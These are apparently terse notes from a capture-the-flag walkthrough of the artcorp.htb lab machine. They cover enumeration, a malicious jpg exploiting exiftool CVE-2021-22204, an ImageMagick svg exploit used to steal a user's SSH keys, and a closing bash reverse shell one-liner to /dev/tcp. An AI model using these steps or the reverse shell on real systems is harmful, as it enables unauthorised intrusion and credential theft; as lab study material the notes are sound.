nmap -sV -sC
No directories found using:
gobuster dir --url artcorp.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 > gobuster_dir.txt
https://github.com/hubdotcom/marlon-tools/blob/master/tools/dnsproxy/dnsproxy.py
Found dev01 subdmain using:
gobuster dns -t 30 -w /usr/share/wordlists/subdomains-top1million-110000.txt -d artcorp.htb
looks like service may be running exiftool to get the metadata
May contain CVE-2021-22204-exiftool
Used this tool to create malicious jpg
https://github.com/convisolabs/CVE-2021-22204-exiftool
now we have access to the machine as www-data user
we need to be thomas user in order to read user flag
lets scan the system process to check for any vulnerable services
https://github.com/DominicBreuker/pspy
using pspy (unprivileged Linux process snooping)
upload to uploads folder and execute
some of these proceses may be vulnerable
$ mogrify --version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29
https://www.exploit-db.com/exploits/39767
uploaded a malicious svg file wich exploits te vulneravility
now lets get ssh keys using this vuln so that we can ssh as thomas
Lets use this key to login as thomas
####now we get root user
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1